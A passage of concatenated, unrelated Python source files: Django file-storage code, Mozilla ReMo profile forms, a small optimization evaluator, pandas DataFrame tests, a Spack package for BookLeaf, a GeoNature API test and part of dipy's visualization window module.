os.umask(old_umask)
else:
os.makedirs(directory)
except OSError as e:
if e.errno != errno.EEXIST:
raise
if not os.path.isdir(directory):
raise IOError("%s exists and is not a directory." % directory)
# There's a potential race condition between get_available_name and
# saving the file; it's possible that two threads might return the
# same name, at which point all sorts of fun happens. So we need to
# try to create the file, but if it already exists we have to go back
# to get_available_name() and try again.
while True:
try:
# This file has a file path that we can move.
if hasattr(content, 'temporary_file_path'):
file_move_safe(content.temporary_file_path(), full_path)
# This is a normal uploadedfile that we can stream.
else:
# This fun binary flag incantation makes os.open throw an
# OSError if the file already exists before we open it.
flags = (os.O_WRONLY | os.O_CREAT | os.O_EXCL |
getattr(os, 'O_BINARY', 0))
# The current umask value is masked out by os.open!
fd = os.open(full_path, flags, 0o666)
_file = None
try:
locks.lock(fd, locks.LOCK_EX)
for chunk in content.chunks():
if _file is None:
mode = 'wb' if isinstance(chunk, bytes) else 'wt'
_file = os.fdopen(fd, mode)
_file.write(chunk)
finally:
locks.unlock(fd)
if _file is not None:
_file.close()
else:
os.close(fd)
except OSError as e:
if e.errno == errno.EEXIST:
# Ooops, the file exists. We need a new file name.
name = self.get_available_name(name)
full_path = self.path(name)
else:
raise
else:
# OK, the file save worked. Break out of the loop.
break
if self.file_permissions_mode is not None:
os.chmod(full_path, self.file_permissions_mode)
return name
def delete(self, name):
assert name, "The name argument is not allowed to be empty."
name = self.path(name)
# If the file exists, delete it from the filesystem.
# Note that there is a race between os.path.exists and os.remove:
# if os.remove fails with ENOENT, the file was removed
# concurrently, and we can continue normally.
if os.path.exists(name):
try:
os.remove(name)
except OSError as e:
if e.errno != errno.ENOENT:
raise
def exists(self, name):
return os.path.exists(self.path(name))
def listdir(self, path):
path = self.path(path)
directories, files = [], []
for entry in os.listdir(path):
if os.path.isdir(os.path.join(path, entry)):
directories.append(entry)
else:
files.append(entry)
return directories, files
def path(self, name):
return safe_join(self.location, name)
def size(self, name):
return os.path.getsize(self.path(name))
def url(self, name):
if self.base_url is None:
raise ValueError("This file is not accessible via a URL.")
url = filepath_to_uri(name)
if url is not None:
url = url.lstrip('/')
return urljoin(self.base_url, url)
def accessed_time(self, name):
warnings.warn(
'FileSystemStorage.accessed_time() is deprecated in favor of '
'get_accessed_time().',
RemovedInDjango20Warning,
stacklevel=2,
)
return datetime.fromtimestamp(os.path.getatime(self.path(name)))
def created_time(self, name):
warnings.warn(
'FileSystemStorage.created_time() is deprecated in favor of '
'get_created_time().',
RemovedInDjango20Warning,
stacklevel=2,
)
return datetime.fromtimestamp(os.path.getctime(self.path(name)))
def modified_time(self, name):
warnings.warn(
'FileSystemStorage.modified_time() is deprecated in favor of '
'get_modified_time().',
RemovedInDjango20Warning,
stacklevel=2,
)
return datetime.fromtimestamp(os.path.getmtime(self.path(name)))
def _datetime_from_timestamp(self, ts):
"""
If timezone support is enabled, make an aware datetime object in UTC;
otherwise make a naive one in the local timezone.
"""
if settings.USE_TZ:
# Safe to use .replace() because UTC doesn't have DST
return datetime.utcfromtimestamp(ts).replace(tzinfo=timezone.utc)
else:
return datetime.fromtimestamp(ts)
def get_accessed_time(self, name):
return self._datetime_from_timestamp(os.path.getatime(self.path(name)))
def get_created_time(self, name):
return self._datetime_from_timestamp(os.path.getctime(self.path(name)))
def get_modified_time(self, name):
return self._datetime_from_timestamp(os.path.getmtime(self.path(name)))
def get_storage_class(import_path=None):
return import_string(import_path or settings.DEFAULT_FILE_STORAGE)
class DefaultStorage(LazyObject):
def _setup(self):
self._wrapped = get_storage_class()()
default_storage = DefaultStorage()
|
import happyforms
import re
from datetime import timedelta
from django import forms
from django.conf import settings
from django.contrib.auth.models import User
from django.core.exceptions import ValidationError
from django.forms.extras.widgets import SelectDateWidget
from django.utils.safestring import mark_safe
from django.utils.timezone import now
from mozilla_django_oidc.auth import default_username_algo
from product_details import product_details
from pytz import common_timezones
from remo.base.templatetags.helpers import user_is_rep
from remo.base.utils import get_date
from remo.profiles.models import (FunctionalArea, MobilisingInterest, MobilisingSkill,
UserProfile, UserStatus)
USERNAME_ALGO = getattr(settings, 'OIDC_USERNAME_ALGO', default_username_algo)
BOOLEAN_CHOICES = ((True, 'Yes'), (False, 'No'))
# Max period that a user can be unavailable in weeks
MAX_UNAVAILABILITY_PERIOD = 12
# SOP url for leaving the program
LEAVING_SOP_URL = ('<a href="https://wiki.mozilla.org/ReMo/SOPs/Leaving" '
'target="_blank">Leaving SOP</a>')
class InviteUserForm(happyforms.Form):
"""Form to invite a new user."""
def _validate_unique_email(data, **kwargs):
# Django does not require unique emails but we do.
if User.objects.filter(email=data).exists():
user = User.objects.filter(email=data)
if user and user[0].groups.filter(name='Mozillians').exists():
user[0].delete()
else:
raise ValidationError('User already exists.')
return data
email = forms.EmailField(label='Email',
validators=[_validate_unique_email])
class ChangeUserForm(happyforms.ModelForm):
"""Form to change user details."""
email = forms.EmailField()
class Meta:
model = User
fields = ('first_name', 'last_name', 'email')
def _clean_names(self, data):
"""Ensure that data is valid.
Variable data can contain only Latin letters (both capital and
lower case), spaces and the character '.
"""
if not re.match(r'(^[A-Za-z\' ]+$)', data):
raise ValidationError('Please use only Latin characters.')
return data
def clean_first_name(self):
"""Ensure that first_name is valid."""
data = self.cleaned_data['first_name']
return self._clean_names(data)
def clean_last_name(self):
"""Ensure that last_name is valid."""
data = self.cleaned_data['last_name']
return self._clean_names(data)
def clean_email(self):
email = self.cleaned_data['email']
if (User.objects.filter(email=email)
.exclude(email=self.instance.email)
.exists()):
msg = ("Email already exists. You probably used this email to "
"sign in as a 'mozillian' into the portal. "
"Please send an email to "
"https://lists.mozilla.org/listinfo/reps-webdev "
"to get help.")
raise ValidationError(msg)
return email
def save(self):
"""Override save method to update user's
username hash on the database.
"""
self.instance.username = USERNAME_ALGO(self.instance.email)
super(ChangeUserForm, self).save()
class ChangeProfileForm(happyforms.ModelForm):
"""Form to change userprofile details."""
gender = forms.ChoiceField(required=False, choices=((None, "Gender"),
(True, "Female"),
(False, "Male")))
mentor = forms.ModelChoiceField(
queryset=(User.objects.filter(userprofile__registration_complete=True,
groups__name='Mentor')
.order_by('first_name')),
required=False,
empty_label=u'Please choose a mentor')
country = forms.ChoiceField(
choices=[],
error_messages={'required': 'Please select one option from the list.'})
timezone = forms.ChoiceField(choices=[], required=False)
def __init__(self, *args, **kwargs):
"""Initialize form.
Dynamically set choices for country fields.
"""
self.request = kwargs.pop('request', None)
super(ChangeProfileForm, self).__init__(*args, **kwargs)
countries = product_details.get_regions('en').values()
countries.sort()
country_choices = ([('', "Country")] +
[(country, country) for country in countries])
self.fields['country'].choices = country_choices
timezone_choices = ([('', 'Timezone')] +
zip(common_timezones, common_timezones))
self.fields['timezone'].choices = timezone_choices
def clean_twitter_account(self):
"""Make sure that twitter_account does not start with a '@'."""
twitter_account = self.cleaned_data['twitter_account']
return twitter_account.strip('@')
def clean_mentor(self):
"""Make sure that we don't save an empty mentor if it was not part of the request"""
if not self.request.user.has_perm('profiles.can_change_mentor'):
self.cleaned_data['mentor'] = self.instance.mentor
return self.cleaned_data['mentor']
class Meta:
model = UserProfile
fields = ('local_name', 'birth_date',
'city', 'region', 'country',
'lon', 'lat', 'display_name',
'private_email', 'mozillians_profile_url',
'twitter_account', 'jabber_id', 'irc_name',
'irc_channels', 'facebook_url', 'linkedin_url',
'diaspora_url', 'personal_website_url', 'personal_blog_feed',
'bio', 'gender', 'mentor', 'wiki_profile_url',
'functional_areas', 'mobilising_skills', 'mobilising_interests',
'timezone')
class ChangeDatesForm(happyforms.ModelForm):
"""Form to change the dates that user joined and left the program."""
class Meta:
model = UserProfile
fields = ['date_joined_program', 'date_left_program']
widgets = {'date_joined_program':
SelectDateWidget(years=range(2011, now().date().year + 1)),
'date_left_program':
SelectDateWidget(years=range(2011, now().date().year + 1))}
def __init__(self, *args, **kwargs):
super(ChangeDatesForm, self).__init__(*args, **kwargs)
# Set the year portion of the date_left_program field same as the
# date_joined_program field
if self.instance and 'date_left_program' in self.fields:
form_widget = SelectDateWidget(years=range(
self.instance.date_joined_program.year, now().date().year + 1))
self.fields['date_left_program'].widget = form_widget
def save(self, commit=True):
"""Override save method for custom functinality."""
# If a user belongs to the Alumni group and no date is suplied for
# leaving the program, the date is auto-populated.
# If a user is not member of the Alumni group the date_left_program
# must be None
if self.instance.user.groups.filter(name='Alumni').exists():
if 'date_left_program' not in self.changed_data:
self.instance.date_left_program = now().date()
else:
self.instance.date_left_program = None
super(ChangeDatesForm, self).save()
class FunctionalAreaForm(happyforms.ModelForm):
"""Form of functional areas."""
class Meta:
model = FunctionalArea
fields = ['name', 'active']
class MobilisingSkillForm(happyforms.ModelForm):
"""Form of mobilising skill."""
class Meta:
model = MobilisingSkill
fields = ['name', 'active']
class MobilisingInterestForm(happyforms.ModelForm):
"""Form of mobilising interest."""
class Meta:
model = MobilisingInterest
fields = ['name', 'active']
class UserStatusForm(happyforms.ModelForm):
"""Form for displaying info regarding the availability status of a user."""
start_date = forms.DateField(input_formats=['%d %B %Y'])
expected_date = forms.DateField(input_formats=['%d %B %Y'])
is_replaced = forms.BooleanField(widget=forms.RadioSelect(
choices=BOOLEAN_CHOICES, attrs={'id': 'id_is_replaced'}),
required=False)
def __init__(self, *args, **kwargs):
super(UserStatusForm, self).__init__(*args, **kwargs)
query = (User.objects.filter(
groups__name='Rep', userprofile__registration_complete=True)
.exclude(id=self.instance.user.id).order_by('first_name'))
self.fields['replacement_rep'].queryset = query
if self.instance.id:
self.fields['expected_date'].widget = forms.HiddenInput()
self.fields['start_date'].widget = forms.HiddenInput()
self.fields['start_date'].required = False
def clean(self):
"""Clean Form."""
cdata = super(UserStatusForm, self).clean()
if self.instance.id:
cdata['start_date'] = self.instance.start_date
return cdata
tomorrow = get_date(days=1)
today = get_date()
if 'start_date' in cdata:
if cdata['start_date'] < today:
msg = u'Start date cannot be in the past.'
self._errors['start_date'] = self.error_class([msg])
if 'expected_date' in cdata:
start_date = cdata['start_date']
expected_date = cdata['expected_date']
max_period = start_date + timedelta(weeks=MAX_UNAVAILABILITY_PERIOD)
if expected_date < tomorrow:
msg = (u'Return day cannot be earlier than {0}'
.format(tomorrow.strftime('%d %B %Y')))
self._errors['expected_date'] = self.error_class([msg])
if expected_date < start_date:
msg = u'Return date cannot be before start date.'
self._errors['expected_date'] = self.error_class([msg])
if expected_date > max_period:
msg = (u'The maximum period for unavailability is until {0}.'
.format(max_period.strftime('%d %B %Y')))
sop = mark_safe(msg + (' For more information please check '
'the %s') % LEAVING_SOP_URL)
self._errors['expected_date'] = self.error_class([sop])
if ('is_replaced' in cdata and
cdata['is_replaced'] and not cdata['replacement_rep']):
msg = 'Please select a replacement Rep during your absence.'
self._errors['replacement_rep'] = self.error_class([msg])
return cdata
class Meta:
model = UserStatus
fields = ['start_date', 'expected_date', 'replacement_rep']
class RotmNomineeForm(happyforms.Form):
"""Form for nominating the Rep of the month."""
is_rotm_nominee = forms.BooleanField(widget=forms.RadioSelect(
choices=BOOLEAN_CHOICES, attrs={'id': 'id_is_rotm_nominee'}),
required=False)
def __init__(self, *args, **kwargs):
""" Initialize the form
Dynamically set the default value to true if the user is not already
nominated.
"""
self.instance = kwargs.pop('instance', None)
super(RotmNomineeForm, self).__init__(*args, **kwargs)
self.fields['is_rotm_nominee'].widget = forms.HiddenInput()
if self.instance and not self.instance.is_rotm_nominee:
self.fields['is_rotm_nominee'].initial = True
def clean(self):
"""Clean Form."""
cdata = super(RotmNomineeForm, self).clean()
user = self.instance.user
if not user_is_rep(user):
raise ValidationError('You cannot nominate a non Rep user.')
return cdata
def save(self, nominated_by, *args, **kwargs):
if (self.instance and not self.instance.is_rotm_nominee and
nominated_by != self.instance.user and
self.cleaned_data['is_rotm_nominee']):
self.instance.is_rotm_nominee = True
self.instance.rotm_nominated_by = nominated_by
self.instance.save()
|
import os
import time
import numpy as np
from threading import Thread
class ObjectiveFunction:
def __init__(self):
self.population = None
def initialize(self, population):
self.population = population
def ids_sorted(self, selection):
values = np.array([self.population.value(i) for i in selection])
argsort = np.argsort(values)
return np.array(selection)[argsort]
def get_values(self, selection):
ret = {}
for i in selection:
ret[i] = self.population.value(i)
return ret
class Evaluator:
def __init__(self):
self.process = None
self.thread = None
self.population = None
@property
def is_running(self):
if self.thread is not None:
return self.thread.is_alive()
else:
return False
def initialize(self, population):
self.population = population
def evaluate(self, i):
x = self.population.coordinate(i)
y = self.population.function(x)
if y is not None:
self.population.set_value(i, y)
self.population.evaluated.append(i)
def run(self):
def worker(evaluator, population):
while True:
for i in population.actives:
if not population.is_evaluated(i):
evaluator.evaluate(i)
time.sleep(1)
if os.path.exists('stop'):
os.remove('stop')
return
# self.process = Process(target=worker, args=(self.population,))
# self.process.start()
self.thread = Thread(target=worker, args=(self, self.population,))
self.thread.daemon = True
self.thread.start()
def stop(self):
if self.process is not None and not self.process.is_alive():
self.process.terminate()
|
from copy import deepcopy
from distutils.version import LooseVersion
from operator import methodcaller
import numpy as np
import pytest
import pandas.util._test_decorators as td
import pandas as pd
from pandas import DataFrame, MultiIndex, Series, date_range
import pandas.util.testing as tm
from pandas.util.testing import (
assert_almost_equal, assert_frame_equal, assert_series_equal)
from .test_generic import Generic
try:
import xarray
_XARRAY_INSTALLED = True
except ImportError:
_XARRAY_INSTALLED = False
class TestDataFrame(Generic):
_typ = DataFrame
_comparator = lambda self, x, y: assert_frame_equal(x, y)
def test_rename_mi(self):
df = DataFrame([
11, 21, 31
], index=MultiIndex.from_tuples([("A", x) for x in ["a", "B", "c"]]))
df.rename(str.lower)
def test_set_axis_name(self):
df = pd.DataFrame([[1, 2], [3, 4]])
funcs = ['_set_axis_name', 'rename_axis']
for func in funcs:
result = methodcaller(func, 'foo')(df)
assert df.index.name is None
assert result.index.name == 'foo'
result = methodcaller(func, 'cols', axis=1)(df)
assert df.columns.name is None
assert result.columns.name == 'cols'
def test_set_axis_name_mi(self):
df = DataFrame(
np.empty((3, 3)),
index=MultiIndex.from_tuples([("A", x) for x in list('aBc')]),
columns=MultiIndex.from_tuples([('C', x) for x in list('xyz')])
)
level_names = ['L1', 'L2']
funcs = ['_set_axis_name', 'rename_axis']
for func in funcs:
result = methodcaller(func, level_names)(df)
assert result.index.names == level_names
assert result.columns.names == [None, None]
result = methodcaller(func, level_names, axis=1)(df)
assert result.columns.names == ["L1", "L2"]
assert result.index.names == [None, None]
def test_nonzero_single_element(self):
# allow single item via bool method
df = DataFrame([[True]])
assert df.bool()
df = DataFrame([[False]])
assert not df.bool()
df = DataFrame([[False, False]])
with pytest.raises(ValueError):
df.bool()
with pytest.raises(ValueError):
bool(df)
def test_get_numeric_data_preserve_dtype(self):
# get the numeric data
o = DataFrame({'A': [1, '2', 3.]})
result = o._get_numeric_data()
expected = DataFrame(index=[0, 1, 2], dtype=object)
self._compare(result, expected)
def test_metadata_propagation_indiv(self):
# groupby
df = DataFrame(
{'A': ['foo', 'bar', 'foo', 'bar', 'foo', 'bar', 'foo', 'foo'],
'B': ['one', 'one', 'two', 'three', 'two', 'two', 'one', 'three'],
'C': np.random.randn(8),
'D': np.random.randn(8)})
result = df.groupby('A').sum()
self.check_metadata(df, result)
# resample
df = DataFrame(np.random.randn(1000, 2),
index=date_range('20130101', periods=1000, freq='s'))
result = df.resample('1T')
self.check_metadata(df, result)
# merging with override
# GH 6923
_metadata = DataFrame._metadata
_finalize = DataFrame.__finalize__
np.random.seed(10)
df1 = DataFrame(np.random.randint(0, 4, (3, 2)), columns=['a', 'b'])
df2 = DataFrame(np.random.randint(0, 4, (3, 2)), columns=['c', 'd'])
DataFrame._metadata = ['filename']
df1.filename = 'fname1.csv'
df2.filename = 'fname2.csv'
def finalize(self, other, method=None, **kwargs):
for name in self._metadata:
if method == 'merge':
left, right = other.left, other.right
value = getattr(left, name, '') + '|' + getattr(right,
name, '')
object.__setattr__(self, name, value)
else:
object.__setattr__(self, name, getattr(other, name, ''))
return self
DataFrame.__finalize__ = finalize
result = df1.merge(df2, left_on=['a'], right_on=['c'], how='inner')
assert result.filename == 'fname1.csv|fname2.csv'
# concat
# GH 6927
DataFrame._metadata = ['filename']
df1 = DataFrame(np.random.randint(0, 4, (3, 2)), columns=list('ab'))
df1.filename = 'foo'
def finalize(self, other, method=None, **kwargs):
for name in self._metadata:
if method == 'concat':
value = '+'.join([getattr(
o, name) for o in other.objs if getattr(o, name, None)
])
object.__setattr__(self, name, value)
else:
object.__setattr__(self, name, getattr(other, name, None))
return self
DataFrame.__finalize__ = finalize
result = pd.concat([df1, df1])
assert result.filename == 'foo+foo'
# reset
DataFrame._metadata = _metadata
DataFrame.__finalize__ = _finalize
def test_set_attribute(self):
# Test for consistent setattr behavior when an attribute and a column
# have the same name (Issue #8994)
df = DataFrame({'x': [1, 2, 3]})
df.y = 2
df['y'] = [2, 4, 6]
df.y = 5
assert df.y == 5
assert_series_equal(df['y'], Series([2, 4, 6], name='y'))
@pytest.mark.skipif(not _XARRAY_INSTALLED or _XARRAY_INSTALLED and
LooseVersion(xarray.__version__) <
LooseVersion('0.10.0'),
reason='xarray >= 0.10.0 required')
@pytest.mark.parametrize(
"index", ['FloatIndex', 'IntIndex',
'StringIndex', 'UnicodeIndex',
'DateIndex', 'PeriodIndex',
'CategoricalIndex', 'TimedeltaIndex'])
def test_to_xarray_index_types(self, index):
from xarray import Dataset
index = getattr(tm, 'make{}'.format(index))
df = DataFrame({'a': list('abc'),
'b': list(range(1, 4)),
'c': np.arange(3, 6).astype('u1'),
'd': np.arange(4.0, 7.0, dtype='float64'),
'e': [True, False, True],
'f': pd.Categorical(list('abc')),
'g': pd.date_range('20130101', periods=3),
'h': pd.date_range('20130101',
periods=3,
tz='US/Eastern')}
)
df.index = index(3)
df.index.name = 'foo'
df.columns.name = 'bar'
result = df.to_xarray()
assert result.dims['foo'] == 3
assert len(result.coords) == 1
assert len(result.data_vars) == 8
assert_almost_equal(list(result.coords.keys()), ['foo'])
assert isinstance(result, Dataset)
# idempotency
# categoricals are not preserved
# datetimes w/tz are not preserved
# column names are lost
expected = df.copy()
expected['f'] = expected['f'].astype(object)
expected['h'] = expected['h'].astype('datetime64[ns]')
expected.columns.name = None
assert_frame_equal(result.to_dataframe(), expected,
check_index_type=False, check_categorical=False)
@td.skip_if_no('xarray', min_version='0.7.0')
def test_to_xarray(self):
from xarray import Dataset
df = DataFrame({'a': list('abc'),
'b': list(range(1, 4)),
'c': np.arange(3, 6).astype('u1'),
'd': np.arange(4.0, 7.0, dtype='float64'),
'e': [True, False, True],
'f': pd.Categorical(list('abc')),
'g': pd.date_range('20130101', periods=3),
'h': pd.date_range('20130101',
periods=3,
tz='US/Eastern')}
)
df.index.name = 'foo'
result = df[0:0].to_xarray()
assert result.dims['foo'] == 0
assert isinstance(result, Dataset)
# available in 0.7.1
# MultiIndex
df.index = pd.MultiIndex.from_product([['a'], range(3)],
names=['one', 'two'])
result = df.to_xarray()
assert result.dims['one'] == 1
assert result.dims['two'] == 3
assert len(result.coords) == 2
assert len(result.data_vars) == 8
assert_almost_equal(list(result.coords.keys()), ['one', 'two'])
assert isinstance(result, Dataset)
result = result.to_dataframe()
expected = df.copy()
expected['f'] = expected['f'].astype(object)
expected['h'] = expected['h'].astype('datetime64[ns]')
expected.columns.name = None
assert_frame_equal(result,
expected,
check_index_type=False)
def test_deepcopy_empty(self):
# This test covers empty frame copying with non-empty column sets
# as reported in issue GH15370
empty_frame = DataFrame(data=[], index=[], columns=['A'])
empty_frame_copy = deepcopy(empty_frame)
self._compare(empty_frame_copy, empty_frame)
|
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class BookleafCpp(CMakePackage):
"""BookLeaf is a 2D unstructured hydrodynamics mini-app."""
homepage = "https://github.com/UK-MAC/BookLeaf_Cpp"
url = "https://github.com/UK-MAC/BookLeaf_Cpp/archive/v2.0.tar.gz"
git = "https://github.com/UK-MAC/BookLeaf_Cpp.git"
version('develop', branch='develop')
version('2.0.2', sha256='787ade5045415d71d9bad55fe9f93598f3a0548d13e2ff80e752cc99f62fe6d3')
version('2.0.1', sha256='1286f916f59d1f3bf325041854e8c203894e293c5e26d5b19b9362ee02082983')
version('2.0', sha256='3c14344c31385bec9e089f9babf815566c4fcf98a47822f663afa2cefb0e90e1')
variant('typhon', default=True, description='Use Typhon')
variant('parmetis', default=False, description='Use ParMETIS')
variant('silo', default=False, description='Use Silo')
variant('caliper', default=False, description='Use Caliper')
depends_on('caliper', when='+caliper')
depends_on('parmetis', when='+parmetis')
depends_on('silo', when='+silo')
depends_on('typhon', when='+typhon')
depends_on('mpi', when='+typhon')
depends_on('[email protected]:')
def cmake_args(self):
spec = self.spec
cmake_args = []
if '+typhon' in spec:
cmake_args.append('-DENABLE_TYPHON=ON')
if '+parmetis' in spec:
cmake_args.append('-DENABLE_PARMETIS=ON')
if '+silo' in spec:
cmake_args.append('-DENABLE_SILO=ON')
if '+caliper' in spec:
cmake_args.append('-DENABLE_CALIPER=ON')
return cmake_args
|
# '''
# Test de l'api gn_media
# '''
import pytest
from flask import url_for
from .bootstrap_test import app
from geonature.core.gn_monitoring.models import TBaseSites
from geonature.core.gn_monitoring.config_manager import generate_config
from pypnnomenclature.models import TNomenclatures
from geonature.utils.env import DB
@pytest.mark.usefixtures('client_class')
class TestAPICore:
# TODO: revoie ce test, ne comprend pas ce qu'il fait
# def test_gn_core_route_config(self):
# response = self.client.get(
# url_for('core.get_config')
# )
# query_string= {
# 'app':'test',
# 'vue':'test'
# }
# # response = requests.get(
# # '{}/config?app=test&vue=test'.format(
# # geonature_app.config['API_ENDPOINT']
# # )
# # )
# assert response.status_code == 200
def test_gn_core_generic_view(self):
query_string = {
'cd_nom':60612,
'ilike_lb_nom':'Ly'
}
response = self.client.get(
url_for(
'core.get_generic_view',
view_schema='gn_synthese',
view_name='v_synthese_for_web_app'
),
query_string=query_string
)
assert response.status_code == 200
|
from __future__ import division, print_function, absolute_import
import gzip
from warnings import warn
import numpy as np
from scipy import ndimage
from copy import copy
from nibabel.tmpdirs import InTemporaryDirectory
from nibabel.py3k import asbytes
try:
import Tkinter as tkinter
has_tkinter = True
except ImportError:
try:
import tkinter
has_tkinter = True
except ImportError:
has_tkinter = False
try:
import tkFileDialog as filedialog
except ImportError:
try:
from tkinter import filedialog
except ImportError:
has_tkinter = False
# Conditional import machinery for vtk
from dipy.utils.optpkg import optional_package
from dipy import __version__ as dipy_version
from dipy.utils.six import string_types
from dipy.viz.interactor import CustomInteractorStyle
# Allow import, but disable doctests if we don't have vtk
vtk, have_vtk, setup_module = optional_package('vtk')
colors, have_vtk_colors, _ = optional_package('vtk.util.colors')
numpy_support, have_ns, _ = optional_package('vtk.util.numpy_support')
_, have_imread, _ = optional_package('Image')
if not have_imread:
_, have_imread, _ = optional_package('PIL')
if have_vtk:
version = vtk.vtkVersion.GetVTKSourceVersion().split(' ')[-1]
major_version = vtk.vtkVersion.GetVTKMajorVersion()
from vtk.util.numpy_support import vtk_to_numpy
vtkRenderer = vtk.vtkRenderer
else:
vtkRenderer = object
if have_imread:
from scipy.misc import imread
class Renderer(vtkRenderer):
""" Your scene class
This is an important object that is responsible for preparing objects
e.g. actors and volumes for rendering. This is a more pythonic version
of ``vtkRenderer`` proving simple methods for adding and removing actors
but also it provides access to all the functionality
available in ``vtkRenderer`` if necessary.
"""
def background(self, color):
""" Set a background color
"""
self.SetBackground(color)
def add(self, *actors):
""" Add an actor to the renderer
"""
for actor in actors:
if isinstance(actor, vtk.vtkVolume):
self.AddVolume(actor)
elif isinstance(actor, vtk.vtkActor2D):
self.AddActor2D(actor)
elif hasattr(actor, 'add_to_renderer'):
actor.add_to_renderer(self)
else:
self.AddActor(actor)
def rm(self, actor):
""" Remove a specific actor
"""
self.RemoveActor(actor)
def clear(self):
""" Remove all actors from the renderer
"""
self.RemoveAllViewProps()
def rm_all(self):
""" Remove all actors from the renderer
"""
self.RemoveAllViewProps()
def projection(self, proj_type='perspective'):
""" Deside between parallel or perspective projection
Parameters
----------
proj_type : str
Can be 'parallel' or 'perspective' (default).
"""
if proj_type == 'parallel':
self.GetActiveCamera().ParallelProjectionOn()
else:
self.GetActiveCamera().ParallelProjectionOff()
def reset_camera(self):
""" Reset the camera to an automatic position given by the engine.
"""
self.ResetCamera()
def reset_clipping_range(self):
self.ResetCameraClippingRange()
def camera(self):
return self.GetActiveCamera()
def get_camera(self):
cam = self.GetActiveCamera()
return cam.GetPosition(), cam.GetFocalPoint(), cam.GetViewUp()
def camera_info(self):
cam = self.camera()
print('# Active Camera')
print(' Position (%.2f, %.2f, %.2f)' % cam.GetPosition())
print(' Focal Point (%.2f, %.2f, %.2f)' % cam.GetFocalPoint())
print(' View Up (%.2f, %.2f, %.2f)' % cam.GetViewUp())
def set_camera(self, position=None, focal_point=None, view_up=None):
if position is not None:
self.GetActiveCamera().SetPosition(*position)
if focal_point is not None:
self.GetActiveCamera().SetFocalPoint(*focal_point)
if view_up is not None:
self.GetActiveCamera().SetViewUp(*view_up)
self.ResetCameraClippingRange()
def size(self):
""" Renderer size"""
return self.GetSize()
def zoom(self, value):
""" In perspective mode, decrease the view angle by the specified
factor. In parallel mode, decrease the parallel scale by the specified
factor. A value greater than 1 is a zoom-in, a value less than 1 is a
zoom-out.
"""
self.GetActiveCamera().Zoom(value)
def azimuth(self, angle):
""" Rotate the camera about the view up vector centered at the focal
point. Note that the view up vector is whatever was set via SetViewUp,
and is not necessarily perpendicular to the direction of projection.
The result is a horizontal rotation of the camera.
"""
self.GetActiveCamera().Azimuth(angle)
def yaw(self, angle):
""" Rotate the focal point about the view up vector, using the camera's
position as the center of rotation. Note that the view up vector is
whatever was set via SetViewUp, and is not necessarily perpendicular
to the direction of projection. The result is a horizontal rotation of
the scene.
"""
self.GetActiveCamera().Yaw(angle)
def elevation(self, angle):
""" Rotate the camera about the cross product of the negative of the
direction of projection and the view up vector, using the focal point
as the center of rotation. The result is a vertical rotation of the
scene.
"""
self.GetActiveCamera().Elevation(angle)
def pitch(self, angle):
""" Rotate the focal point about the cross product of the view up
vector and the direction of projection, using the camera's position as
the center of rotation. The result is a vertical rotation of the
camera.
"""
self.GetActiveCamera().Pitch(angle)
def roll(self, angle):
""" Rotate the camera about the direction of projection. This will
spin the camera about its axis.
"""
self.GetActiveCamera().Roll(angle)
def dolly(self, value):
""" Divide the camera's distance from the focal point by the given
dolly value. Use a value greater than one to dolly-in toward the focal
point, and use a value less than one to dolly-out away from the focal
point.
"""
self.GetActiveCamera().Dolly(value)
def camera_direction(self):
""" Get the vector in the direction from the camera position to the
focal point. This is usually the opposite of the ViewPlaneNormal, the
vector perpendicular to the screen, unless the view is oblique.
"""
return self.GetActiveCamera().GetDirectionOfProjection()
def renderer(background=None):
""" Create a renderer.
Parameters
----------
background : tuple
Initial background color of renderer
Returns
-------
v : Renderer
Examples
--------
>>> from dipy.viz import fvtk
>>> import numpy as np
>>> r=fvtk.ren()
>>> lines=[np.random.rand(10,3)]
>>> c=fvtk.line(lines, fvtk.colors.red)
>>> fvtk.add(r,c)
>>> #fvtk.show(r)
"""
deprecation_msg = ("Method 'dipy.viz.window.renderer' is deprecated, instead"
" use class 'dipy.viz.window.Renderer'.")
warn(DeprecationWarning(deprecation_msg))
ren = Renderer()
if background is not None:
ren.SetBackground(background)
return ren
if have_vtk:
ren = renderer
def add(ren, a):
""" Add a specific actor
"""
ren.add(a)
def rm(ren, a):
""" Remove a specific actor
"""
ren.rm(a)
def clear(ren):
""" Remove all actors from the renderer
"""
ren.clear()
def rm_all(ren):
""" Remove all actors from the renderer
"""
ren.rm_all()
def open_file_dialog(file_types=[("All files", "*")]):
""" Simple Tk file dialog for opening files
Parameters
----------
file_types : tuples of tuples
Accepted file types.
Returns
-------
file_paths : sequence of str
Returns the full paths of all selected files
"""
root = tkinter.Tk()
root.withdraw()
file_paths = filedialog.askopenfilenames(filetypes=file_types)
return file_paths
def save_file_dialog(initial_file='dipy.png', default_ext='.png',
file_types=(("PNG file", "*.png"), ("All Files", "*.*"))):
""" Simple Tk file dialog for saving a file
Parameters
----------
initial_file : str
For example ``dipy.png``.
default_ext : str
Default extension to appear in the save dialog.
file_types : tuples of tuples
Accepted file types.
Returns
-------
filepath : str
Complete filename of saved file
"""
root = tkinter.Tk()
root.withdraw()
file_path = filedialog.asksaveasfilename(initialfile=initial_file,
defaultextension=default_ext,
filetypes=file_types)
return file_path
class ShowManager(object):
""" This class is the interface between the renderer, the window and the
interactor.
"""
def __init__(self, ren=None, title='DIPY', size=(300, 300),
png_magnify=1, reset_camera=True, order_transparent=False,
interactor_style='custom'):
""" Manages the visualization pipeline
Parameters
----------
ren : Renderer() or vtkRenderer()
The scene that holds all the actors.
title : string
A string for the window title bar.
size : (int, int)
``(width, height)`` of the window. Default is (300, 300).
png_magnify : int
Number of times to magnify the screenshot. This can be used to save
high resolution screenshots when pressing 's' inside the window.
reset_camera : bool
Default is True. You can change this option to False if you want to
keep the camera as set before calling this function.
order_transparent : bool
True is useful when you want to order transparent
actors according to their relative position to the camera. The
default option which is False will order the actors according to
the order of their addition to the Renderer().
interactor_style : str or vtkInteractorStyle
If str then if 'trackball' then vtkInteractorStyleTrackballCamera()
is used, if 'image' then vtkInteractorStyleImage() is used (no
rotation) or if 'custom' then CustomInteractorStyle is used.
Otherwise you can input your own interactor style.
Attributes
----------
ren : vtkRenderer()
iren : vtkRenderWindowInteractor()
style : vtkInteractorStyle()
window : vtkRenderWindow()
Methods
-------
initialize()
render()
start()
add_window_callback()
Notes
-----
Default interaction keys for
* 3d navigation are with left, middle and right mouse dragging
* resetting the camera press 'r'
* saving a screenshot press 's'
